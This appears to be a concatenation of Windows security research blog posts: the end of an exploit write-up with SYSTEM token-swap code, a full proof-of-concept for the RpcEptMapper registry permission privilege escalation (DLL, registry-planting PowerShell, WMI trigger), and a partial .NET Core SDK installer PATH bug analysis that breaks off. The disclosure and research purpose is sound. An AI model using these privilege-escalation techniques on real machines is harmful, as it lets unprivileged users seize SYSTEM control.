Below is a stripped-down version of the code that allows us to replace the Token of the Process that was created by the client with the copy of the current SYSTEM Token. It should be noted that, for this operation to succeed, the target Process must be in a SUSPENDED state.

PROCESS_ACCESS_TOKEN tokenInfo = { 0 };
tokenInfo.Token = hSystemTokenDup;
tokenInfo.Thread = NULL;

NtSetInformationProcess(
    hClientProcess,                 // Client's Process handle (PROCESS_ALL_ACCESS)
    ProcessAccessToken,             // Type of information to set (ProcessAccessToken = 9)
    &tokenInfo,                     // A reference to a structure containing the SYSTEM Token handle
    sizeof(tokenInfo)               // Size of the structure
);

As briefly mentioned previously, the NtSetInformationProcess function is not documented. It is part of the Native API so it is not directly accessible within the Windows SDK. You have to define its prototype in your own header file and then import it manually from the NTDLL at runtime. Anyway, this function is very powerful as it allows you to change the Token of a Process, even after it has been created. Pretty cool, isn’t it?
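
In practice, this means defining the structure and the function prototype yourself and resolving the function from the NTDLL with GetProcAddress, along these lines (a sketch based on publicly available NT header definitions):

#include <Windows.h>

#define ProcessAccessToken 9  // PROCESSINFOCLASS value used to set a Process' Primary Token

typedef struct _PROCESS_ACCESS_TOKEN {
    HANDLE Token;   // Handle to a Primary Token
    HANDLE Thread;  // Reserved, should be NULL
} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;

typedef LONG (NTAPI *PNT_SET_INFORMATION_PROCESS)(
    HANDLE ProcessHandle,
    ULONG ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength
);

// Resolve the function from ntdll.dll at runtime
PNT_SET_INFORMATION_PROCESS NtSetInformationProcess = (PNT_SET_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle(L"ntdll"), "NtSetInformationProcess");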

Once this is done, the client can simply resume the main Thread and that’s it! You get a nice SYSTEM shell in your console.

Conclusion

There are some implementation steps I did not mention in this post because the main point was to discuss how we could develop an exploit that does not require IPC communications. For example, I used a Global Event in order to synchronize the main exploit with the payload that is executed within the DLL. But, the exploit would have worked without it as well.

Then, when I say that I did not use Inter-Process Communications, one could argue that it is not completely true because I did use the name of the DLL to convey some information in the end. But, it turns out that it is not strictly required either. You could still do the exact same thing without using this trick. For example, you could implement something very similar to an “egg hunter”. You could create an egg (e.g.: a predefined string) in the memory of your process and then, from within the DLL, you could open every single Process and search their memory to find this egg. From there, you can get the ID of the main Process and thus determine the ID of its child Process as well. It was just way more convenient to communicate the PID directly through the filename here.
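
For illustration, the memory scan part of such an egg hunter could look something like this. It is a simplified sketch: ProcessContainsEgg is a hypothetical helper, and the enumeration of candidate PIDs is left out.

#include <Windows.h>
#include <stdlib.h>
#include <string.h>

// Scan the committed, readable memory of a candidate Process for a unique marker (the "egg")
BOOL ProcessContainsEgg(DWORD dwPid, const BYTE* pEgg, SIZE_T cbEgg)
{
    BOOL bFound = FALSE;
    MEMORY_BASIC_INFORMATION mbi = { 0 };
    LPBYTE pAddress = NULL;

    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwPid);
    if (!hProcess)
        return FALSE;

    while (!bFound && VirtualQueryEx(hProcess, pAddress, &mbi, sizeof(mbi)) == sizeof(mbi))
    {
        if (mbi.State == MEM_COMMIT && !(mbi.Protect & (PAGE_NOACCESS | PAGE_GUARD)))
        {
            BYTE* pBuffer = (BYTE*)malloc(mbi.RegionSize);
            SIZE_T cbRead = 0;
            if (pBuffer && ReadProcessMemory(hProcess, mbi.BaseAddress, pBuffer, mbi.RegionSize, &cbRead))
            {
                for (SIZE_T i = 0; !bFound && i + cbEgg <= cbRead; i++)
                    if (memcmp(pBuffer + i, pEgg, cbEgg) == 0)
                        bFound = TRUE;
            }
            free(pBuffer);
        }
        pAddress = (LPBYTE)mbi.BaseAddress + mbi.RegionSize;
    }

    CloseHandle(hProcess);
    return bFound;
}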

With this little exploit development process, I learned a few things that I wanted to share. So, as always, I hope you have learned something too by reading this. That’s it for today!

Links & Resources

Windows RpcEptMapper Service Insecure Registry Permissions EoP

If you follow me on Twitter, you probably know that I developed my own Windows privilege escalation enumeration script - PrivescCheck - which is a sort of updated and extended version of the famous PowerUp. If you have ever run this script on Windows 7 or Windows Server 2008 R2, you probably noticed a weird recurring result and perhaps thought that it was a false positive just as I did. Or perhaps you’re reading this and you have no idea what I am talking about. Anyway, the only thing you should know is that this script actually did spot a Windows 0-day privilege escalation vulnerability. Here is the story behind this finding…

A Bit of Context…

At the beginning of this year, I started working on a privilege escalation enumeration script: PrivescCheck. The idea was to build on the work that had already been accomplished with the famous PowerUp tool and implement a few more checks that I found relevant. With this script, I simply wanted to be able to quickly enumerate potential vulnerabilities caused by system misconfigurations, but it actually yielded some unexpected results. Indeed, it enabled me to find a 0-day vulnerability in Windows 7 / Server 2008 R2!

Given a fully patched Windows machine, one of the main security issues that can lead to local privilege escalation is service misconfiguration. If a normal user is able to modify an existing service then he/she can execute arbitrary code in the context of LOCAL/NETWORK SERVICE or even LOCAL SYSTEM. Here are the most common vulnerabilities. There is nothing new so you can skip this part if you are already familiar with these concepts.

  • Service Control Manager (SCM) - Low-privileged users can be granted specific permissions on a service through the SCM. For example, a normal user can start the Windows Update service with the command sc.exe start wuauserv thanks to the SERVICE_START permission. This is a very common scenario. However, if this same user had SERVICE_CHANGE_CONFIG, he/she would be able to alter the behavior of that service and make it run an arbitrary executable.

  • Binary permissions - A typical Windows service usually has a command line associated with it. If you can modify the corresponding executable (or if you have write permissions in the parent folder) then you can basically execute whatever you want in the security context of that service.

  • Unquoted paths - This issue is related to the way Windows parses command lines. Let’s consider a fictitious service with the following command line: C:\Applications\Custom Service\service.exe /v. This command line is ambiguous so Windows would first try to execute C:\Applications\Custom.exe with Service\service.exe as the first argument (and /v as the second argument). If a normal user had write permissions in C:\Applications then he/she could hijack the service by copying a malicious executable to C:\Applications\Custom.exe. That’s why paths should always be surrounded by quotes, especially when they contain spaces: "C:\Applications\Custom Service\service.exe" /v

  • Phantom DLL hijacking (and writable %PATH% folders) - Even on a default installation of Windows, some built-in services try to load DLLs that don’t exist. That’s not a vulnerability per se but if one of the folders that are listed in the %PATH% environment variable is writable by a normal user then these services can be hijacked.

Each one of these potential security issues already had a corresponding check in PowerUp but there is another case where misconfiguration may arise: the registry. Usually, when you create a service, you do so by invoking the Service Control Manager using the built-in command sc.exe as an administrator. This will create a subkey with the name of your service in HKLM\SYSTEM\CurrentControlSet\Services and all the settings (command line, user, etc.) will be saved in this subkey. So, if these settings are managed by the SCM, they should be secure by default. At least that’s what I thought…

Checking Registry Permissions

One of the core functions of PowerUp is Get-ModifiablePath. The basic idea behind this function is to provide a generic way to check whether the current user can modify a file or a folder in any way (e.g.: AppendData/AddSubdirectory). It does so by parsing the ACL of the target object and then comparing it to the permissions that are given to the current user account through all the groups it belongs to. Although this principle was originally implemented for files and folders, registry keys are securable objects too. Therefore, it’s possible to implement a similar function to check if the current user has any write permissions on a registry key. That’s exactly what I did and I thus added a new core function: Get-ModifiableRegistryPath.

Then, implementing a check for modifiable registry keys corresponding to Windows services is as easy as calling the Get-ChildItem PowerShell command on the path Registry::HKLM\SYSTEM\CurrentControlSet\Services. The result can simply be piped to the new Get-ModifiableRegistryPath command, and that’s all.

When I need to implement a new check, I use a Windows 10 machine, and I also use the same machine for the initial testing to see if everything is working as expected. When the code is stable, I extend the tests to a few other Windows VMs to make sure that it’s still PowerShell v2 compatible and that it can still run on older systems. The operating systems I use the most for that purpose are Windows 7, Windows 2008 R2 and Windows Server 2012 R2.

When I ran the updated script on a default installation of Windows 10, it didn’t return anything, which was the result I expected. But then, I ran it on Windows 7 and I saw this:

Since I didn’t expect the script to yield any result, I first thought that these were false positives and that I had messed up at some point in the implementation. But, before getting back to the code, I did take a closer look at these results…

A False Positive?

According to the output of the script, the current user has some write permissions on two registry keys:

  • HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
  • HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper

Let’s manually check the permissions of the RpcEptMapper service using the regedit GUI. One thing I really like about the Advanced Security Settings window is the Effective Permissions tab. You can pick any user or group name and immediately see the effective permissions that are granted to this principal without the need to inspect all the ACEs separately. The following screenshot shows the result for the low privileged lab-user account.

Most permissions are standard (e.g.: Query Value) but one in particular stands out: Create Subkey. The generic name corresponding to this permission is AppendData/AddSubdirectory, which is exactly what was reported by the script:

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {ReadControl, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : BUILTIN\Users
Permissions       : {WriteExtendedAttributes, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

What does this mean exactly? It means that we cannot just modify the ImagePath value for example. To do so, we would need the WriteData/AddFile permission. Instead, we can only create a new subkey.

Does it mean that it was indeed a false positive? Surely not. Let the fun begin!

RTFM

At this point, we know that we can create arbitrary subkeys under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper but we cannot modify existing subkeys and values. These already existing subkeys are Parameters and Security, which are quite common for Windows services.
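
As a quick sanity check, this distinction can also be verified programmatically by requesting the two access rights separately. On an affected machine, opening the key with KEY_CREATE_SUB_KEY should succeed for a low-privileged user, whereas KEY_SET_VALUE should be denied (minimal sketch):

#include <Windows.h>
#include <stdio.h>

int wmain(void)
{
    LPCWSTR pwszKey = L"SYSTEM\\CurrentControlSet\\Services\\RpcEptMapper";
    HKEY hKey = NULL;
    LSTATUS status;

    // Create Subkey (AppendData/AddSubdirectory) -> expected to be granted
    status = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pwszKey, 0, KEY_CREATE_SUB_KEY, &hKey);
    wprintf(L"KEY_CREATE_SUB_KEY -> %ws\n", status == ERROR_SUCCESS ? L"granted" : L"denied");
    if (status == ERROR_SUCCESS) RegCloseKey(hKey);

    // Set Value (WriteData/AddFile) -> expected to be denied
    status = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pwszKey, 0, KEY_SET_VALUE, &hKey);
    wprintf(L"KEY_SET_VALUE -> %ws\n", status == ERROR_SUCCESS ? L"granted" : L"denied");
    if (status == ERROR_SUCCESS) RegCloseKey(hKey);

    return 0;
}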

Therefore, the first question that came to mind was: is there any other predefined subkey - such as Parameters and Security - that we could leverage to effectively modify the configuration of the service and alter its behavior in any way?

To answer this question, my initial plan was to enumerate all existing keys and try to identify a pattern. The idea was to see which subkeys are meaningful for a service’s configuration. I started to think about how I could implement that in PowerShell and then sort the result. Though, before doing so, I wondered if this registry structure was already documented. So, I googled something like windows service configuration registry site:microsoft.com and here is the very first result that came out.

Looks promising, doesn’t it? At first glance, the documentation did not seem to be exhaustive and complete. Considering the title, I expected to see some sort of tree structure detailing all the subkeys and values defining a service’s configuration but it was clearly not there.

Still, I did take a quick look at each paragraph. And, I quickly spotted the keywords “Performance” and “DLL”. Under the subtitle “Performance”, we can read the following:

Performance: A key that specifies information for optional performance monitoring. The values under this key specify the name of the driver’s performance DLL and the names of certain exported functions in that DLL. You can add value entries to this subkey using AddReg entries in the driver’s INF file.

According to this short paragraph, one can theoretically register a DLL in a driver service in order to monitor its performance thanks to the Performance subkey. OK, this is really interesting! This key doesn’t exist by default for the RpcEptMapper service so it looks like it is exactly what we need. There is a slight problem though: this service is definitely not a driver service. Anyway, it’s still worth a try, but we need more information about this “Performance Monitoring” feature first.

Note: in Windows, each service has a given Type. A service type can be one of the following values: SERVICE_KERNEL_DRIVER (1), SERVICE_FILE_SYSTEM_DRIVER (2), SERVICE_ADAPTER (4), SERVICE_RECOGNIZER_DRIVER (8), SERVICE_WIN32_OWN_PROCESS (16), SERVICE_WIN32_SHARE_PROCESS (32) or SERVICE_INTERACTIVE_PROCESS (256).

After some googling, I found this resource in the documentation: Creating the Application’s Performance Key.

First, there is a nice tree structure that lists all the keys and values we have to create. Then, the description gives the following key information:

  • The Library value can contain a DLL name or a full path to a DLL.
  • The Open, Collect, and Close values allow you to specify the names of the functions that should be exported by the DLL.
  • The data type of these values is REG_SZ (or even REG_EXPAND_SZ for the Library value).

If you follow the links that are included in this resource, you’ll even find the prototype of these functions along with some code samples: Implementing OpenPerformanceData.

DWORD APIENTRY OpenPerfData(LPWSTR pContext);
DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
DWORD APIENTRY ClosePerfData();

I think that’s enough theory; it’s time to start writing some code!

Writing a Proof-of-Concept

Thanks to all the bits and pieces I was able to collect throughout the documentation, writing a simple Proof-of-Concept DLL should be pretty straightforward. But still, we need a plan!

When I need to exploit some sort of DLL hijacking vulnerability, I usually start with a simple and custom log helper function. The purpose of this function is to write some key information to a file whenever it’s invoked. Typically, I log the PID of the current process and the parent process, the name of the user that runs the process and the corresponding command line. I also log the name of the function that triggered this log event. This way, I know which part of the code was executed.

In my other articles, I always skipped the development part because I assumed that it was more or less obvious. But, I also want my blog posts to be beginner-friendly, so there is a contradiction. I will remedy this situation here by detailing the process. So, let’s fire up Visual Studio and create a new “C++ Console App” project. Note that I could have created a “Dynamic-Link Library (DLL)” project but I find it actually easier to just start with a console app.

Here is the initial code generated by Visual Studio:

#include <iostream>

int main()
{
    std::cout << "Hello World!\n";
}

Of course, that’s not what we want. We want to create a DLL, not an EXE, so we have to replace the main function with DllMain. You can find a skeleton code for this function in the documentation: Initialize a DLL.

#include <Windows.h>

extern "C" BOOL WINAPI DllMain(HINSTANCE const instance, DWORD const reason, LPVOID const reserved)
{
    switch (reason)
    {
    case DLL_PROCESS_ATTACH:
        Log(L"DllMain"); // See log helper function below
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

In parallel, we also need to change the settings of the project to specify that the output compiled file should be a DLL rather than an EXE. To do so, you can open the project properties and, in the “General” section, select “Dynamic Library (.dll)” as the “Configuration Type”. Right under the title bar, you can also select “All Configurations” and “All Platforms” so that this setting can be applied globally.

Next, I add my custom log helper function.

#include <Lmcons.h> // UNLEN + GetUserName
#include <tlhelp32.h> // CreateToolhelp32Snapshot()
#include <strsafe.h>

void Log(LPCWSTR pwszCallingFrom)
{
    LPWSTR pwszBuffer, pwszCommandLine;
    WCHAR wszUsername[UNLEN + 1] = { 0 };
    SYSTEMTIME st = { 0 };
    HANDLE hToolhelpSnapshot;
    PROCESSENTRY32 stProcessEntry = { 0 };
    DWORD dwPcbBuffer = UNLEN, dwBytesWritten = 0, dwProcessId = 0, dwParentProcessId = 0, dwBufSize = 0;
    BOOL bResult = FALSE;

    // Get the command line of the current process
    pwszCommandLine = GetCommandLine();

    // Get the name of the process owner
    GetUserName(wszUsername, &dwPcbBuffer);

    // Get the PID of the current process
    dwProcessId = GetCurrentProcessId();

    // Get the PID of the parent process
    hToolhelpSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    stProcessEntry.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hToolhelpSnapshot, &stProcessEntry)) {
        do {
            if (stProcessEntry.th32ProcessID == dwProcessId) {
                dwParentProcessId = stProcessEntry.th32ParentProcessID;
                break;
            }
        } while (Process32Next(hToolhelpSnapshot, &stProcessEntry));
    }
    CloseHandle(hToolhelpSnapshot);

    // Get the current date and time
    GetLocalTime(&st);

    // Prepare the output string and log the result
    dwBufSize = 4096 * sizeof(WCHAR);
    pwszBuffer = (LPWSTR)malloc(dwBufSize);
    if (pwszBuffer)
    {
        StringCchPrintf(pwszBuffer, dwBufSize / sizeof(WCHAR), L"[%.2u:%.2u:%.2u] - PID=%d - PPID=%d - USER='%s' - CMD='%s' - METHOD='%s'\r\n", // cchDest is a character count, not a byte count
            st.wHour,
            st.wMinute,
            st.wSecond,
            dwProcessId,
            dwParentProcessId,
            wszUsername,
            pwszCommandLine,
            pwszCallingFrom
        );

        LogToFile(L"C:\\LOGS\\RpcEptMapperPoc.log", pwszBuffer); // LogToFile() is a custom helper (not shown here) that writes the buffer to the given log file

        free(pwszBuffer);
    }
}

Then, we can populate the DLL with the three functions we saw in the documentation. The documentation also states that they should return ERROR_SUCCESS if successful.

DWORD APIENTRY OpenPerfData(LPWSTR pContext)
{
    Log(L"OpenPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned)
{
    Log(L"CollectPerfData");
    return ERROR_SUCCESS;
}

DWORD APIENTRY ClosePerfData()
{
    Log(L"ClosePerfData");
    return ERROR_SUCCESS;
}

Ok, so the project is now properly configured, DllMain is implemented, we have a log helper function and the three required functions. One last thing is missing though. If we compile this code, OpenPerfData, CollectPerfData and ClosePerfData will be available as internal functions only so we need to export them. This can be achieved in several ways. For example, you could create a DEF file and then configure the project appropriately. However, I prefer to use the __declspec(dllexport) keyword (doc), especially for a small project like this one. This way, we just have to declare the three functions at the beginning of the source code.

extern "C" __declspec(dllexport) DWORD APIENTRY OpenPerfData(LPWSTR pContext);
extern "C" __declspec(dllexport) DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
extern "C" __declspec(dllexport) DWORD APIENTRY ClosePerfData();

If you want to see the full code, I uploaded it here.

Finally, we can select Release/x64 and “Build the solution”. This will produce our DLL file: .\DllRpcEndpointMapperPoc\x64\Release\DllRpcEndpointMapperPoc.dll.

Testing the PoC

Before going any further, I always make sure that my payload is working properly by testing it separately. The little time spent here can save a lot of time afterwards by preventing you from going down a rabbit hole during a hypothetical debug phase. To do so, we can simply use rundll32.exe and pass the name of the DLL and the name of an exported function as the parameters.

C:\Users\lab-user\Downloads>rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData

Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by rundll32.exe. The second one was written when OpenPerfData was called. Looks good! :slightly_smiling_face:

[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='DllMain'
[21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='OpenPerfData'

Ok, now we can focus on the actual vulnerability and start by creating the required registry key and values. We can either do this manually using reg.exe / regedit.exe or programmatically with a script. Since I already went through the manual steps during my initial research, I’ll show a cleaner way to do the same thing with a PowerShell script. Besides, creating registry keys and values in PowerShell is as easy as calling New-Item and New-ItemProperty, isn’t it? :thinking:

Requested registry access is not allowed… Hmmm, ok… It looks like it won’t be that easy after all. :stuck_out_tongue:

I didn’t really investigate this issue but my guess is that when we call New-Item, powershell.exe actually tries to open the parent registry key with some flags that correspond to permissions we don’t have.

Anyway, if the built-in cmdlets don’t do the job, we can always go down one level and invoke DotNet functions directly. Indeed, registry keys can also be created with the following code in PowerShell.

[Microsoft.Win32.Registry]::LocalMachine.CreateSubKey("SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance")

Here we go! In the end, I put together the following script in order to create the appropriate key and values, wait for some user input and finally terminate by cleaning everything up.

$ServiceKey = "SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance"

Write-Host "[*] Create 'Performance' subkey"
[void] [Microsoft.Win32.Registry]::LocalMachine.CreateSubKey($ServiceKey)
Write-Host "[*] Create 'Library' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Value "$($pwd)\DllRpcEndpointMapperPoc.dll" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Open' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Value "OpenPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Collect' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Value "CollectPerfData" -PropertyType "String" -Force | Out-Null
Write-Host "[*] Create 'Close' value"
New-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Value "ClosePerfData" -PropertyType "String" -Force | Out-Null

Read-Host -Prompt "Press any key to continue"

Write-Host "[*] Cleanup"
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Library" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Open" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Collect" -Force
Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Force
[Microsoft.Win32.Registry]::LocalMachine.DeleteSubKey($ServiceKey)

Now, the last step: how do we trick the RPC Endpoint Mapper service into loading our Performance DLL? Unfortunately, I haven’t kept track of all the different things I tried. It would have been really interesting in the context of this blog post to highlight how tedious and time-consuming research can sometimes be. Anyway, one thing I found along the way is that you can query Performance Counters using WMI (Windows Management Instrumentation), which isn’t too surprising after all. More info here: WMI Performance Counter Types.

Counter types appear as the CounterType qualifier for properties in Win32_PerfRawData classes, and as the CookingType qualifier for properties in Win32_PerfFormattedData classes.

So, I first enumerated the WMI classes that are related to Performance Data in PowerShell using the following command.

Get-WmiObject -List | Where-Object { $_.Name -Like "Win32_Perf*" }

And, I saw that my log file was created almost right away! Here is the content of the file.

[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='DllMain'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='OpenPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'
[21:17:49] - PID=4904 - PPID=664 - USER='SYSTEM' - CMD='C:\Windows\system32\wbem\wmiprvse.exe' - METHOD='CollectPerfData'

I expected to get arbitrary code execution as NETWORK SERVICE in the context of the RpcEptMapper service at most, but it looks like I got a much better result than anticipated. I actually got arbitrary code execution in the context of the WMI service itself, which runs as LOCAL SYSTEM. How amazing is that?! :sunglasses:

Note: if I had got arbitrary code execution as NETWORK SERVICE, I would have been just a token away from the LOCAL SYSTEM account thanks to the trick that was demonstrated by James Forshaw a few months ago in this blog post: Sharing a Logon Session a Little Too Much.

I also tried to get each WMI class separately and I observed the exact same result.

Get-WmiObject Win32_Perf
Get-WmiObject Win32_PerfRawData
Get-WmiObject Win32_PerfFormattedData

Conclusion

I don’t know how this vulnerability has gone unnoticed for so long. One explanation is that other tools probably looked for full write access in the registry, whereas AppendData/AddSubdirectory was actually enough in this case. Regarding the “misconfiguration” itself, I would assume that the registry key was set this way for a specific purpose, although I can’t think of a concrete scenario in which users would have any kind of permissions to modify a service’s configuration.

I decided to write about this vulnerability publicly for two reasons. The first one is that I actually made it public - without initially realizing it - the day I updated my PrivescCheck script with the Get-ModifiableRegistryPath function, which was several months ago. The second one is that the impact is low. It requires local access and affects only old versions of Windows that are no longer supported (unless you have purchased the Extended Support…). At this point, if you are still using Windows 7 / Server 2008 R2 without isolating these machines properly in the network first, then preventing an attacker from getting SYSTEM privileges is probably the least of your worries.

Apart from the anecdotal side of this privilege escalation vulnerability, I think that this “Performance” registry setting opens up really interesting opportunities for post exploitation, lateral movement and AV/EDR evasion. I already have a few particular scenarios in mind but I haven’t tested any of them yet. To be continued?…

Links & Resources

Windows .Net Core SDK Elevation of Privilege

There was a weird bug in the DotNet Core Toolset installer that allowed any local user to elevate their privileges to SYSTEM. In this blog post, I want to share the details of this bug that was silently (but only partially) fixed despite not being acknowledged as a vulnerability by Microsoft.

Introduction

In March 2020, jonaslyk told me about a weird bug he encountered on his personal computer. The SYSTEM’s PATH environment variable was populated with a path that was seemingly related to DotNet. The weird thing was that this path pointed to a non-admin user folder. So, I checked on my own machine but, although there was a DotNet-related path, it pointed to a local admin folder. Anyway, if the path of a user-owned folder can be appended to this environment variable, that means code execution as SYSTEM. So, we decided to work together on this strange case and see what we could come up with.

The Initial Setup

We started with a clean and fully updated installation of Windows 10. In this initial state, here is the default value of the SYSTEM account’s PATH environment variable. As a reminder, S-1-5-18 is the Security Identifier (SID) of the LocalSystem account.

reg query "HKU\S-1-5-18\Environment" /v Path

Then we installed Visual Studio Community 2019 (link). Once installed, we selected the .Net desktop development component in the Installer.

After clicking the “Install” button, the packages are downloaded and installed.

We are looking for a registry key modification so we can use Process Monitor to easily monitor what’s going on in the background.

Things get interesting when the “.Net Core toolset” is installed. We can see a RegSetValue operation originating from an executable called dotnet.exe on HKU\.DEFAULT\Environment\PATH. After this event, we can see that the PATH value in HKU\S-1-5-18\Environment is indeed different.

We may notice two potential issues here:

  1. The variable %USERPROFILE% is resolved to the current user’s home folder instead of the SYSTEM account’s home folder.
  2. Another path, pointing to a user-owned folder once again, is appended to the SYSTEM account’s PATH.

In these two cases, the current user is a local administrator so the consequences of such modifications are somewhat limited. Though, they shouldn’t occur because they may have unintended side effects (e.g.: UAC bypass).

After reading this, you might have a feeling of déjà vu. If so, it means that you probably stumbled upon this post by @RedVuln at some point: .Net System Persistence / bypassuac / Privesc. It looks like he found this bug almost at the same time Jonas and I were working on it. But there is a problem: all of this can be achieved only as an administrator because the installation of the DotNet SDK requires such privileges. Or does it?

The Actual Privilege Escalation Vulnerability

In the previous part, we saw that the installation process of the .Net SDK had some potentially unintended consequences on the Path Environment variable of the SYSTEM account. Though, strictly speaking, this doesn’t lead to an Elevation of Privilege.

But, what if I told you that the exact same behavior could be reproduced while being logged in as a normal user with no admin rights?

When Visual Studio is installed, several MSI files seem to be copied to the C:\Windows\Installer folder. Since we observed that the RegSetValue operation originated from an executable called dotnet.exe, we can try to search for this string in these files. Here is what we get using the findstr command.

cd "C:\Windows\Installer"
findstr /I /M "dotnet.exe" "*.msi"

Great! We have two matches. What we can do next is try to run each of these files as a normal user with the command msiexec /qn /a <FILE> and observe the result on the SYSTEM account’s Environment Path variable in the registry.

Running the first MSI file, we don’t see anything. However, running the second MSI file, we observe the exact same operation which initially occurred when we installed the DotNet SDK as an administrator.

This time though, because the MSI file was run by the user lab-user, the path C:\Users\lab-user\.dotnet\tools is appended to the SYSTEM account’s PATH environment variable. As a result, this user can now get code execution as SYSTEM by planting a DLL and waiting for a service to load it. This can be achieved - on Windows 10 - by hijacking the WptsExtensions.dll DLL which is loaded by the Task Scheduler service upon startup, as described by @RedVuln in his post.

Root Cause Analysis

The exploitation of this bug is trivial so I will focus on the root cause analysis instead, which turned out to be quite interesting for me.

The question is: where do we start? Well, let’s start at the beginning… :slightly_smiling_face:

We have a Process Monitor dump file that contains the RegSetValue event we are interested in. That’s a good starting point. Let’s see what we can learn from the Stack Trace.

We can see that the dotnet.exe executable loads several DLLs and then loads several .Net assemblies.

Looking at the details of the Process Start operation, we can see the following command line:

"C:\Program Files\dotnet\\dotnet.exe" exec "C:\Program Files\dotnet\\sdk\3.1.200\dotnet.dll" internal-reportinstallsuccess ""

From this command line, we may assume that the Win32 dotnet.exe executable is actually a wrapper for the dotnet.dll assembly, which is loaded with the following arguments: internal-reportinstallsuccess "".

Therefore, reversing this assembly should provide us with all the answers we are looking for:

  1. How does the executable evaluate the .Net Core tools path?
  2. How does the executable add the path to the SYSTEM account’s PATH in the registry?

To inspect this assembly, I used dnSpy. It’s definitely the best tool I’ve used so far for this kind of task.

The Program’s Main starts by calling Program.ProcessArgs().

Several things happen in this function but the most important part is framed in red on the below screenshot.

Indeed, the function with the name ConfigureDotNetForFirstTimeUse() looks like a good candidate to continue the investigation.

This assumption is confirmed when looking at the content of the function because we are starting to see some references to the “Environment Path”.

The method CreateEnvironmentPath() creates an instance of an object implementing the IEnvironmentProvider interface, depending on the underlying Operating System. Thus, it would be a new WindowsEnvironmentPath object here.

The object is instantiated based on a dynamically generated path, which is formed by the concatenation of some string and "tools".

This DotnetUserProfileFolderPath string itself is the concatenation of some other string and ".dotnet".

